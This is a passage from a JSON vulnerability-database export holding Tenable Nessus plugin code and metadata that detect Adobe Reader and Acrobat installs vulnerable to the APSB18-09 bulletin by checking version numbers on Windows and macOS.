remote Windows host is a\nversion prior or equal to 2015.006.30417, 2017.011.30079, or\n2018.011.20038. It is, therefore, affected by multiple\nvulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-09.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Reader 2015.006.30418 / 2017.011.30080\n/ 2018.011.20040 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4947\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat_reader\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"adobe_reader_installed.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"installed_sw/Adobe Reader\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\ninclude(\"vcf_extras.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\napp_info = vcf::adobe_reader::get_app_info();\nconstraints = [\n { \"min_version\" : \"15.6\", \"max_version\" : \"15.6.30417\", \"fixed_version\" : \"15.6.30418\" },\n { \"min_version\" : \"17.8\", \"max_version\" : \"17.11.30079\", \"fixed_version\" : \"17.11.30080\" },\n { \"min_version\" : \"15.7\", \"max_version\" : \"18.11.20038\", \"fixed_version\" : \"18.11.20040\" }\n];\n# using adobe_reader namespace check_version_and_report to properly detect Continuous vs Classic, \n# and limit ver segments to 3 (18.x.y vs 18.x.y.12345) with max_segs:3\nvcf::adobe_reader::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, max_segs:3);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T01:15:43", "description": "The version of Adobe Acrobat installed on the remote Windows host is a\nversion prior to 2015.006.30418, 2017.011.30080,\nor 2018.011.20040. 
It is, therefore, affected by multiple\nvulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 32, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-05-17T00:00:00", "title": "Adobe Acrobat < 2015.006.30418 / 2017.011.30080 / 2018.011.20040 Multiple Vulnerabilities (APSB18-09)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4974", "CVE-2018-4970", "CVE-2018-4987", "CVE-2018-4981", "CVE-2018-4971", "CVE-2018-4948", "CVE-2018-4996", "CVE-2018-4995", "CVE-2018-4986", "CVE-2018-4961", "CVE-2018-4965", "CVE-2018-4967", "CVE-2018-4947", "CVE-2018-4993", "CVE-2018-4985", "CVE-2018-4976", "CVE-2018-4950", "CVE-2018-4984", "CVE-2018-4960", "CVE-2018-12812", "CVE-2018-4975", "CVE-2018-4983", "CVE-2018-4978", "CVE-2018-4951", "CVE-2018-12815", "CVE-2018-4955", "CVE-2018-4963", "CVE-2018-4959", "CVE-2018-4973", "CVE-2018-4968", "CVE-2018-4977", "CVE-2018-4953", "CVE-2018-4964", "CVE-2018-4982", "CVE-2018-4954", "CVE-2018-4956", "CVE-2018-4952", "CVE-2018-4966", "CVE-2018-4989", "CVE-2018-4990", "CVE-2018-4972", "CVE-2018-4962", "CVE-2018-4957", "CVE-2018-4958", "CVE-2018-4988", "CVE-2018-4969", "CVE-2018-4949", "CVE-2018-4980", "CVE-2018-4979"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:adobe:acrobat"], "id": "ADOBE_ACROBAT_APSB18-09.NASL", "href": "https://www.tenable.com/plugins/nessus/109895", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109895);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/04/08 10:48:58\");\n\n script_cve_id(\n \"CVE-2018-4947\",\n \"CVE-2018-4948\",\n \"CVE-2018-4949\",\n \"CVE-2018-4950\",\n \"CVE-2018-4951\",\n \"CVE-2018-4952\",\n \"CVE-2018-4953\",\n \"CVE-2018-4954\",\n \"CVE-2018-4955\",\n \"CVE-2018-4956\",\n \"CVE-2018-4957\",\n \"CVE-2018-4958\",\n \"CVE-2018-4959\",\n 
\"CVE-2018-4960\",\n \"CVE-2018-4961\",\n \"CVE-2018-4962\",\n \"CVE-2018-4963\",\n \"CVE-2018-4964\",\n \"CVE-2018-4965\",\n \"CVE-2018-4966\",\n \"CVE-2018-4967\",\n \"CVE-2018-4968\",\n \"CVE-2018-4969\",\n \"CVE-2018-4970\",\n \"CVE-2018-4971\",\n \"CVE-2018-4972\",\n \"CVE-2018-4973\",\n \"CVE-2018-4974\",\n \"CVE-2018-4975\",\n \"CVE-2018-4976\",\n \"CVE-2018-4977\",\n \"CVE-2018-4978\",\n \"CVE-2018-4979\",\n \"CVE-2018-4980\",\n \"CVE-2018-4981\",\n \"CVE-2018-4982\",\n \"CVE-2018-4983\",\n \"CVE-2018-4984\",\n \"CVE-2018-4985\",\n \"CVE-2018-4986\",\n \"CVE-2018-4987\",\n \"CVE-2018-4988\",\n \"CVE-2018-4989\",\n \"CVE-2018-4990\",\n \"CVE-2018-4993\",\n \"CVE-2018-4995\",\n \"CVE-2018-4996\",\n \"CVE-2018-12812\",\n \"CVE-2018-12815\"\n );\n script_bugtraq_id(\n 104102,\n 104167,\n 104168,\n 104169,\n 104171,\n 104172,\n 104173,\n 104174,\n 104175,\n 104176,\n 104177\n );\n\n script_name(english:\"Adobe Acrobat < 2015.006.30418 / 2017.011.30080 / 2018.011.20040 Multiple Vulnerabilities (APSB18-09)\");\n script_summary(english:\"Checks the version of Adobe Acrobat.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Adobe Acrobat installed on the remote Windows host is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Acrobat installed on the remote Windows host is a\nversion prior to 2015.006.30418, 2017.011.30080,\nor 2018.011.20040. 
It is, therefore, affected by multiple\nvulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-09.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Acrobat 2015.006.30418 / 2017.011.30080\n/ 2018.011.20040 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4947\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"adobe_acrobat_installed.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"installed_sw/Adobe Acrobat\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\ninclude(\"vcf_extras.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\napp_info = vcf::get_app_info(app:\"Adobe Acrobat\", win_local:TRUE);\nconstraints = [\n { \"min_version\" : \"15.6\", \"max_version\" : \"15.6.30417\", \"fixed_version\" : \"15.6.30418\" },\n { \"min_version\" : \"17.8\", \"max_version\" : \"17.11.30079\", \"fixed_version\" : \"17.11.30080\" },\n { \"min_version\" : \"15.7\", \"max_version\" : \"18.11.20038\", \"fixed_version\" : \"18.11.20040\" }\n];\n# using adobe_reader namespace check_version_and_report to properly detect Continuous vs Classic, \n# and limit ver segments to 3 (18.x.y vs 18.x.y.12345) with max_segs:3\nvcf::adobe_reader::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, max_segs:3);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T03:45:05", "description": "The version of Adobe Reader installed on the remote macOS or Mac OS X\nhost is a version prior to 2015.006.30419, 2017.011.30080,\nor 2018.011.20040. 
It is, therefore, affected by multiple\nvulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 32, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-05-17T00:00:00", "title": "Adobe Reader < 2015.006.30418 / 2017.011.30080 / 2018.011.20040 Multiple Vulnerabilities (APSB18-09) (macOS)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4974", "CVE-2018-4970", "CVE-2018-4987", "CVE-2018-4981", "CVE-2018-4971", "CVE-2018-4948", "CVE-2018-4996", "CVE-2018-4995", "CVE-2018-4986", "CVE-2018-4961", "CVE-2018-4965", "CVE-2018-4967", "CVE-2018-4947", "CVE-2018-4993", "CVE-2018-4985", "CVE-2018-4976", "CVE-2018-4950", "CVE-2018-4984", "CVE-2018-4960", "CVE-2018-12812", "CVE-2018-4975", "CVE-2018-4983", "CVE-2018-4978", "CVE-2018-4951", "CVE-2018-12815", "CVE-2018-4955", "CVE-2018-4963", "CVE-2018-4959", "CVE-2018-4973", "CVE-2018-4968", "CVE-2018-4977", "CVE-2018-4953", "CVE-2018-4964", "CVE-2018-4982", "CVE-2018-4954", "CVE-2018-4956", "CVE-2018-4952", "CVE-2018-4966", "CVE-2018-4989", "CVE-2018-4990", "CVE-2018-4972", "CVE-2018-4962", "CVE-2018-4957", "CVE-2018-4958", "CVE-2018-4988", "CVE-2018-4969", "CVE-2018-4949", "CVE-2018-4980", "CVE-2018-4979"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:adobe:acrobat_reader"], "id": "MACOSX_ADOBE_READER_APSB18-09.NASL", "href": "https://www.tenable.com/plugins/nessus/109898", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109898);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/11/04\");\n\n script_cve_id(\n \"CVE-2018-4947\",\n \"CVE-2018-4948\",\n \"CVE-2018-4949\",\n \"CVE-2018-4950\",\n \"CVE-2018-4951\",\n \"CVE-2018-4952\",\n \"CVE-2018-4953\",\n \"CVE-2018-4954\",\n \"CVE-2018-4955\",\n \"CVE-2018-4956\",\n \"CVE-2018-4957\",\n \"CVE-2018-4958\",\n \"CVE-2018-4959\",\n 
\"CVE-2018-4960\",\n \"CVE-2018-4961\",\n \"CVE-2018-4962\",\n \"CVE-2018-4963\",\n \"CVE-2018-4964\",\n \"CVE-2018-4965\",\n \"CVE-2018-4966\",\n \"CVE-2018-4967\",\n \"CVE-2018-4968\",\n \"CVE-2018-4969\",\n \"CVE-2018-4970\",\n \"CVE-2018-4971\",\n \"CVE-2018-4972\",\n \"CVE-2018-4973\",\n \"CVE-2018-4974\",\n \"CVE-2018-4975\",\n \"CVE-2018-4976\",\n \"CVE-2018-4977\",\n \"CVE-2018-4978\",\n \"CVE-2018-4979\",\n \"CVE-2018-4980\",\n \"CVE-2018-4981\",\n \"CVE-2018-4982\",\n \"CVE-2018-4983\",\n \"CVE-2018-4984\",\n \"CVE-2018-4985\",\n \"CVE-2018-4986\",\n \"CVE-2018-4987\",\n \"CVE-2018-4988\",\n \"CVE-2018-4989\",\n \"CVE-2018-4990\",\n \"CVE-2018-4993\",\n \"CVE-2018-4995\",\n \"CVE-2018-4996\",\n \"CVE-2018-12812\",\n \"CVE-2018-12815\"\n );\n script_bugtraq_id(\n 104102,\n 104167,\n 104168,\n 104169,\n 104171,\n 104172,\n 104173,\n 104174,\n 104175,\n 104176,\n 104177\n );\n\n script_name(english:\"Adobe Reader < 2015.006.30418 / 2017.011.30080 / 2018.011.20040 Multiple Vulnerabilities (APSB18-09) (macOS)\");\n script_summary(english:\"Checks the version of Adobe Reader.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Adobe Reader installed on the remote host is affected\nby multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Reader installed on the remote macOS or Mac OS X\nhost is a version prior to 2015.006.30419, 2017.011.30080,\nor 2018.011.20040. 
It is, therefore, affected by multiple\nvulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-09.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Reader 2015.006.30418 / 2017.011.30080\n/ 2018.011.20040 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4996\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat_reader\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_adobe_reader_installed.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"installed_sw/Adobe Reader\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\nget_kb_item_or_exit(\"Host/local_checks_enabled\");\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (empty_or_null(os)) audit(AUDIT_OS_NOT, \"Mac OS X\");\n\napp_info = vcf::get_app_info(app:\"Adobe Reader\");\nbase_dir = app_info['path'] - \"/Applications\";\ntrack = get_kb_item(\"MacOSX/Adobe_Reader\"+base_dir+\"/Track\");\n\nif (!empty_or_null(track) && track == '2017')\n{\n constraints = [\n { \"min_version\" : \"17.8\", \"fixed_version\" : \"17.11.30080\" }\n ];\n}\nelse\n{\n constraints = [\n { \"min_version\" : \"15.6\", \"fixed_version\" : \"15.6.30418\" },\n { \"min_version\" : \"18.8\", \"fixed_version\" : \"18.11.20040\" }\n ];\n}\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T03:44:00", "description": "The version of Adobe Acrobat installed on the remote macOS or Mac OS X\nhost is a version prior to 2015.006.30418, 2017.011.30080,\nor 2018.011.20040. 
It is, therefore, affected by multiple\nvulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 31, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-05-17T00:00:00", "title": "Adobe Acrobat < 2015.006.30418 / 2017.011.30080 / 2018.011.20040 Multiple Vulnerabilities (APSB18-09) (macOS)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4974", "CVE-2018-4970", "CVE-2018-4987", "CVE-2018-4981", "CVE-2018-4971", "CVE-2018-4948", "CVE-2018-4996", "CVE-2018-4995", "CVE-2018-4986", "CVE-2018-4961", "CVE-2018-4965", "CVE-2018-4967", "CVE-2018-4947", "CVE-2018-4993", "CVE-2018-4985", "CVE-2018-4976", "CVE-2018-4950", "CVE-2018-4984", "CVE-2018-4960", "CVE-2018-12812", "CVE-2018-4975", "CVE-2018-4983", "CVE-2018-4978", "CVE-2018-4951", "CVE-2018-12815", "CVE-2018-4955", "CVE-2018-4963", "CVE-2018-4959", "CVE-2018-4973", "CVE-2018-4968", "CVE-2018-4977", "CVE-2018-4953", "CVE-2018-4964", "CVE-2018-4982", "CVE-2018-4954", "CVE-2018-4956", "CVE-2018-4952", "CVE-2018-4966", "CVE-2018-4989", "CVE-2018-4990", "CVE-2018-4972", "CVE-2018-4962", "CVE-2018-4957", "CVE-2018-4958", "CVE-2018-4988", "CVE-2018-4969", "CVE-2018-4949", "CVE-2018-4980", "CVE-2018-4979"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:adobe:acrobat"], "id": "MACOSX_ADOBE_ACROBAT_APSB18-09.NASL", "href": "https://www.tenable.com/plugins/nessus/109897", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109897);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/04/22 9:47:13\");\n\n script_cve_id(\n \"CVE-2018-4947\",\n \"CVE-2018-4948\",\n \"CVE-2018-4949\",\n \"CVE-2018-4950\",\n \"CVE-2018-4951\",\n \"CVE-2018-4952\",\n \"CVE-2018-4953\",\n \"CVE-2018-4954\",\n \"CVE-2018-4955\",\n \"CVE-2018-4956\",\n \"CVE-2018-4957\",\n \"CVE-2018-4958\",\n 
\"CVE-2018-4959\",\n \"CVE-2018-4960\",\n \"CVE-2018-4961\",\n \"CVE-2018-4962\",\n \"CVE-2018-4963\",\n \"CVE-2018-4964\",\n \"CVE-2018-4965\",\n \"CVE-2018-4966\",\n \"CVE-2018-4967\",\n \"CVE-2018-4968\",\n \"CVE-2018-4969\",\n \"CVE-2018-4970\",\n \"CVE-2018-4971\",\n \"CVE-2018-4972\",\n \"CVE-2018-4973\",\n \"CVE-2018-4974\",\n \"CVE-2018-4975\",\n \"CVE-2018-4976\",\n \"CVE-2018-4977\",\n \"CVE-2018-4978\",\n \"CVE-2018-4979\",\n \"CVE-2018-4980\",\n \"CVE-2018-4981\",\n \"CVE-2018-4982\",\n \"CVE-2018-4983\",\n \"CVE-2018-4984\",\n \"CVE-2018-4985\",\n \"CVE-2018-4986\",\n \"CVE-2018-4987\",\n \"CVE-2018-4988\",\n \"CVE-2018-4989\",\n \"CVE-2018-4990\",\n \"CVE-2018-4993\",\n \"CVE-2018-4995\",\n \"CVE-2018-4996\",\n \"CVE-2018-12812\",\n \"CVE-2018-12815\"\n );\n script_bugtraq_id(\n 104102,\n 104167,\n 104168,\n 104169,\n 104171,\n 104172,\n 104173,\n 104174,\n 104175,\n 104176,\n 104177\n );\n\n script_name(english:\"Adobe Acrobat < 2015.006.30418 / 2017.011.30080 / 2018.011.20040 Multiple Vulnerabilities (APSB18-09) (macOS)\");\n script_summary(english:\"Checks the version of Adobe Acrobat.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Adobe Acrobat installed on the remote host is affected\nby multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Acrobat installed on the remote macOS or Mac OS X\nhost is a version prior to 2015.006.30418, 2017.011.30080,\nor 2018.011.20040. 
It is, therefore, affected by multiple\nvulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-09.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Acrobat 2015.006.30418 / 2017.011.30080\n/ 2018.011.20040 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4947\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_adobe_acrobat_installed.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"installed_sw/Adobe Acrobat\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\ninclude(\"vcf_extras.inc\");\n\nget_kb_item_or_exit(\"Host/local_checks_enabled\");\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (empty_or_null(os)) audit(AUDIT_OS_NOT, \"Mac OS X\");\n\napp_info = vcf::get_app_info(app:\"Adobe Acrobat\");\n\n constraints = [\n { \"min_version\" : \"15.6\", \"fixed_version\" : \"15.6.30418\" },\n { \"min_version\" : \"17.8\", \"fixed_version\" : \"17.11.30080\" },\n { \"min_version\" : \"18.8\", \"fixed_version\" : \"18.11.20040\" }\n ];\nvcf::adobe_reader::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, max_segs:3);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}